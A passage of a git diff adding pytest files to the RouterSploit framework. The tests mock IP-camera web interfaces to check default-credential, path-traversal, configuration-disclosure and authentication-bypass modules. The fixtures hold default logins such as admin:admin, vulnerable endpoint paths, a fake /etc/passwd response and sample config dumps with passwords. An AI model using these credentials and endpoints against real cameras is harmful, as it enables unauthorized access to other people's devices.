routersploit.modules.creds.cameras.brickcom.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/brickcom/test_webinterface_http_auth_default_creds.py b/tests/creds/cameras/brickcom/test_webinterface_http_auth_default_creds.py new file mode 100644 index 000000000..0f639991f --- /dev/null +++ b/tests/creds/cameras/brickcom/test_webinterface_http_auth_default_creds.py @@ -0,0 +1,30 @@ +from flask import request, Response +from base64 import b64decode +from routersploit.modules.creds.cameras.brickcom.webinterface_http_auth_default_creds import Exploit + + +def apply_response(*args, **kwargs): + if "Authorization" in request.headers.keys(): + creds = str(b64decode(request.headers["Authorization"].replace("Basic ", "")), "utf-8") + + if creds in ["admin:admin"]: + return "Authorized", 200 + + resp = Response("Unauthorized") + resp.headers["WWW-Authenticate"] = "Basic ABC" + return resp, 401 + + +def test_check_success(target): + """ Test scenario - successful check """ + + cgi_mock = target.get_route_mock("/", methods=["GET", "POST"]) + cgi_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() is True + assert exploit.check_default() is not None + assert exploit.run() is None diff --git a/tests/creds/cameras/canon/__init__.py b/tests/creds/cameras/canon/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/canon/test_telnet_default_creds.py b/tests/creds/cameras/canon/test_telnet_default_creds.py new file mode 100644 index 000000000..a5341728b --- /dev/null +++ b/tests/creds/cameras/canon/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.canon.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/canon/test_webinterface_default_creds.py b/tests/creds/cameras/canon/test_webinterface_default_creds.py new file mode 100644 index 000000000..071c89eec --- /dev/null +++ b/tests/creds/cameras/canon/test_webinterface_default_creds.py @@ -0,0 +1,30 @@ +from flask import request, Response +from base64 import b64decode +from routersploit.modules.creds.cameras.canon.webinterface_http_auth_default_creds import Exploit + + +def apply_response(*args, **kwargs): + if "Authorization" in request.headers.keys(): + creds = str(b64decode(request.headers["Authorization"].replace("Basic ", "")), "utf-8") + + if creds in ["admin:admin"]: + return "Authorized", 200 + + resp = Response("Unauthorized") + resp.headers["WWW-Authenticate"] = "Basic ABC" + return resp, 401 + + +def test_check_success(target): + """ Test scenario - successful check """ + + cgi_mock = target.get_route_mock("/admin/index.html", methods=["GET", "POST"]) + cgi_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() is True + assert exploit.check_default() is not None + assert exploit.run() is None diff --git a/tests/creds/cameras/cisco/__init__.py b/tests/creds/cameras/cisco/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/cisco/test_telnet_default_creds.py b/tests/creds/cameras/cisco/test_telnet_default_creds.py new file mode 100644 index 000000000..8a0bab406 --- /dev/null +++ b/tests/creds/cameras/cisco/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.cisco.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/dlink/__init__.py b/tests/creds/cameras/dlink/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/dlink/test_telnet_default_creds.py b/tests/creds/cameras/dlink/test_telnet_default_creds.py new file mode 100644 index 000000000..69e278f85 --- /dev/null +++ b/tests/creds/cameras/dlink/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.dlink.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/geovision/__init__.py b/tests/creds/cameras/geovision/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/geovision/test_telnet_default_creds.py b/tests/creds/cameras/geovision/test_telnet_default_creds.py new file mode 100644 index 000000000..4772f0e8e --- /dev/null +++ b/tests/creds/cameras/geovision/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.geovision.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/grandstream/__init__.py b/tests/creds/cameras/grandstream/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/grandstream/test_telnet_default_creds.py b/tests/creds/cameras/grandstream/test_telnet_default_creds.py new file mode 100644 index 000000000..255654e17 --- /dev/null +++ b/tests/creds/cameras/grandstream/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.grandstream.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/hikvision/__init__.py b/tests/creds/cameras/hikvision/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/hikvision/test_telnet_default_creds.py b/tests/creds/cameras/hikvision/test_telnet_default_creds.py new file mode 100644 index 000000000..35002067f --- /dev/null +++ b/tests/creds/cameras/hikvision/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.hikvision.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/honeywell/__init__.py b/tests/creds/cameras/honeywell/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/honeywell/test_telnet_default_creds.py b/tests/creds/cameras/honeywell/test_telnet_default_creds.py new file mode 100644 index 000000000..7e710c624 --- /dev/null +++ b/tests/creds/cameras/honeywell/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.honeywell.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/iqinvision/__init__.py b/tests/creds/cameras/iqinvision/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/iqinvision/test_telnet_default_creds.py b/tests/creds/cameras/iqinvision/test_telnet_default_creds.py new file mode 100644 index 000000000..7496a803d --- /dev/null +++ b/tests/creds/cameras/iqinvision/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.iqinvision.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/jvc/__init__.py b/tests/creds/cameras/jvc/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/jvc/test_telnet_default_creds.py b/tests/creds/cameras/jvc/test_telnet_default_creds.py new file mode 100644 index 000000000..0c04041fd --- /dev/null +++ b/tests/creds/cameras/jvc/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.jvc.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/mobotix/__init__.py b/tests/creds/cameras/mobotix/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/mobotix/test_telnet_default_creds.py b/tests/creds/cameras/mobotix/test_telnet_default_creds.py new file mode 100644 index 000000000..aa3aa1082 --- /dev/null +++ b/tests/creds/cameras/mobotix/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.mobotix.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/samsung/__init__.py b/tests/creds/cameras/samsung/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/samsung/test_telnet_default_creds.py b/tests/creds/cameras/samsung/test_telnet_default_creds.py new file mode 100644 index 000000000..ed4b58252 --- /dev/null +++ b/tests/creds/cameras/samsung/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.samsung.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/sentry360/__init__.py b/tests/creds/cameras/sentry360/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/sentry360/test_telnet_default_creds.py b/tests/creds/cameras/sentry360/test_telnet_default_creds.py new file mode 100644 index 000000000..63fc8d1d4 --- /dev/null +++ b/tests/creds/cameras/sentry360/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.sentry360.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/siemens/__init__.py b/tests/creds/cameras/siemens/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/siemens/test_telnet_default_creds.py b/tests/creds/cameras/siemens/test_telnet_default_creds.py new file mode 100644 index 000000000..26ceb1e07 --- /dev/null +++ b/tests/creds/cameras/siemens/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.siemens.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/speco/__init__.py b/tests/creds/cameras/speco/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/speco/test_telnet_default_creds.py b/tests/creds/cameras/speco/test_telnet_default_creds.py new file mode 100644 index 000000000..12b5de510 --- /dev/null +++ b/tests/creds/cameras/speco/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.speco.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/stardot/__init__.py b/tests/creds/cameras/stardot/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/stardot/test_telnet_default_creds.py b/tests/creds/cameras/stardot/test_telnet_default_creds.py new file mode 100644 index 000000000..0a7a1178b --- /dev/null +++ b/tests/creds/cameras/stardot/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.stardot.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/vacron/__init__.py b/tests/creds/cameras/vacron/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/vacron/test_telnet_default_creds.py b/tests/creds/cameras/vacron/test_telnet_default_creds.py new file mode 100644 index 000000000..29740bc49 --- /dev/null +++ b/tests/creds/cameras/vacron/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.vacron.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/creds/cameras/videoiq/__init__.py b/tests/creds/cameras/videoiq/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/creds/cameras/videoiq/test_telnet_default_creds.py b/tests/creds/cameras/videoiq/test_telnet_default_creds.py new file mode 100644 index 000000000..5027004ac --- /dev/null +++ b/tests/creds/cameras/videoiq/test_telnet_default_creds.py @@ -0,0 +1,11 @@ +from routersploit.modules.creds.cameras.videoiq.telnet_default_creds import Exploit + + +def test_check_success(generic_target): + """ Test scenario - successful check """ + + exploit = Exploit() + exploit.target = generic_target.host + exploit.port = generic_target.port + + assert exploit.check() diff --git a/tests/exploits/__init__.py b/tests/exploits/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/cameras/__init__.py b/tests/exploits/cameras/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/cameras/avigilon/__init__.py b/tests/exploits/cameras/avigilon/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/cameras/avigilon/test_videoiq_camera_path_traversal.py b/tests/exploits/cameras/avigilon/test_videoiq_camera_path_traversal.py new file mode 100644 index 000000000..20b721c22 --- /dev/null +++ b/tests/exploits/cameras/avigilon/test_videoiq_camera_path_traversal.py @@ -0,0 +1,30 @@ +from routersploit.modules.exploits.cameras.avigilon.videoiq_camera_path_traversal import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/", methods=["GET"]) + route_mock.return_value = ( + "root:x:0:0:root:/root:/bin/bash" + "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + "bin:x:2:2:bin:/bin:/usr/sbin/nologin" + "sys:x:3:3:sys:/dev:/usr/sbin/nologin" + "sync:x:4:65534:sync:/bin:/bin/sync" + "games:x:5:60:games:/usr/games:/usr/sbin/nologin" + "man:x:6:12:man:/var/cache/man:/usr/sbin/nologin" + "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin" + "mail:x:8:8:mail:/var/mail:/usr/sbin/nologin" + "news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" + "uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin" + "proxy:x:13:13:proxy:/bin:/usr/sbin/nologin" + "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() is False # todo + assert exploit.run() is None diff --git a/tests/exploits/cameras/brickcom/__init__.py b/tests/exploits/cameras/brickcom/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/cameras/brickcom/test_corp_network_cameras_conf_disclosure.py b/tests/exploits/cameras/brickcom/test_corp_network_cameras_conf_disclosure.py new file mode 100644 index 000000000..ec32dd17d --- /dev/null +++ b/tests/exploits/cameras/brickcom/test_corp_network_cameras_conf_disclosure.py @@ -0,0 +1,71 @@ +from routersploit.modules.exploits.cameras.brickcom.corp_network_cameras_conf_disclosure import Exploit + + +configfile = ( + "DeviceBasicInfo.firmwareVersion=v3.0.6.12" + "DeviceBasicInfo.macAddress=00:00:00:00:00:00" + "DeviceBasicInfo.sensorID=OV9X11" + "DeviceBasicInfo.internalName=Brickcom" + "DeviceBasicInfo.productName=Di-1092AX" + "DeviceBasicInfo.displayName=CB-1092AX" + "DeviceBasicInfo.modelNumber=XXX" + "DeviceBasicInfo.companyName=Brickcom Corporation" + "DeviceBasicInfo.comments=[CUBE HD IPCam STREEDM]" + "DeviceBasicInfo.companyUrl=www.brickcom.com" + "DeviceBasicInfo.serialNumber=AXNB02B211111" + "DeviceBasicInfo.skuType=LIT" + "DeviceBasicInfo.ledIndicatorMode=1" + "DeviceBasicInfo.minorFW=1" + "DeviceBasicInfo.hardwareVersion=" + "DeviceBasicInfo.PseudoPDseProdNum=P3301" + "AudioDeviceSetting.muted=0" + "UserSetSetting.userList.size=2" + "UserSetSetting.userList.users0.index=0" + "UserSetSetting.userList.users0.password=MyM4st3rP4ss" + "UserSetSetting.userList.users0.privilege=1" + "UserSetSetting.userList.users0.username=Cam_User" + "UserSetSetting.userList.users1.index=0" + "UserSetSetting.userList.users1.password=C0mm0mP4ss" + ) + + +def test_check_v1_success(target): + """ Test scenario - successful check via method 1 """ + + route_mock = target.get_route_mock("/configfile.dump", methods=["GET"]) + route_mock.return_value = configfile + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None + + +def test_check_v2_success(target): + """ Test scenario - successful check via method 2 """ + + cgi_mock = target.get_route_mock("/configfile.dump.backup", methods=["GET"]) + cgi_mock.return_value = configfile + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None + + +def test_check_v3_success(target): + """ Test scenario - successful check via method 3 """ + + cgi_mock = target.get_route_mock("/configfile.dump.gz", methods=["GET"]) + cgi_mock.return_value = configfile + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/cameras/brickcom/test_users_cgi_creds_disclosure.py b/tests/exploits/cameras/brickcom/test_users_cgi_creds_disclosure.py new file mode 100644 index 000000000..4f0c1810a --- /dev/null +++ b/tests/exploits/cameras/brickcom/test_users_cgi_creds_disclosure.py @@ -0,0 +1,56 @@ +from flask import request, Response +from base64 import b64decode +from routersploit.modules.exploits.cameras.brickcom.users_cgi_creds_disclosure import Exploit + + +response = ( +""" +size=4 +User1.index=1 +User1.username=admin +User1.password=test1234 +User1.privilege=1 + +User2.index=2 +User2.username=viewer +User2.password=viewer +User2.privilege=0 + +User3.index=3 +User3.username=rviewer +User3.password=rviewer +User3.privilege=2 + +User4.index=0 +User4.username=visual +User4.password=visual1234 +User4.privilege=0 + + +""") + + +def apply_response(*args, **kwargs): + if "Authorization" in request.headers.keys(): + creds = str(b64decode(request.headers["Authorization"].replace("Basic ", "")), "utf-8") + + if creds in ["rviewer:rviewer"]: + return response, 200 + + resp = Response("Unauthorized") + resp.headers["WWW-Authenticate"] = "Basic ABC" + return resp, 401 + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/cgi-bin/users.cgi", methods=["GET", "POST"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() is True + assert exploit.run() is None diff --git a/tests/exploits/cameras/dlink/__init__.py b/tests/exploits/cameras/dlink/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/cameras/dlink/test_dcs_930l_932l_auth_bypass.py b/tests/exploits/cameras/dlink/test_dcs_930l_932l_auth_bypass.py new file mode 100644 index 000000000..05e4d63e2 --- /dev/null +++ b/tests/exploits/cameras/dlink/test_dcs_930l_932l_auth_bypass.py @@ -0,0 +1,29 @@ +from flask import request, Response +from base64 import b64decode +from routersploit.modules.exploits.cameras.dlink.dcs_930l_932l_auth_bypass import Exploit + + +content = b64decode(b"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") + + +def apply_response(*args, **kwargs): + resp = Response(content) + 